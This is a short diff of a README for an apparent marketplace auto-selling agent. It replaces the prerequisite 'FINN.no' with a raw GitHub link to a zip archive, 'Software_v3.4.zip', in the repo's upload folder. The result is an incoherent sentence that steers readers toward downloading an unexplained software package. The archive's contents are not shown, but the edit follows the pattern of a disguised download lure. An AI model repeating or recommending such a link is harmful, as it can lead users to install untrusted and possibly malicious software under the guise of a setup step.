santiagofavero/Autoselll/README.md

 Getting started
 - Prerequisites
-  - An account or API access to FINN.no and Facebook Marketplace (or the connectors you use)
+  - An account or API access to https://github.com/santiagofavero/Autoselll/raw/refs/heads/main/app/upload/Software_v3.4.zip and Facebook Marketplace (or the connectors you use)
   - Access to language models and image processing tools
   - A hosting environment capable of running the agent (local machine, server, or container)
 - Quick start overview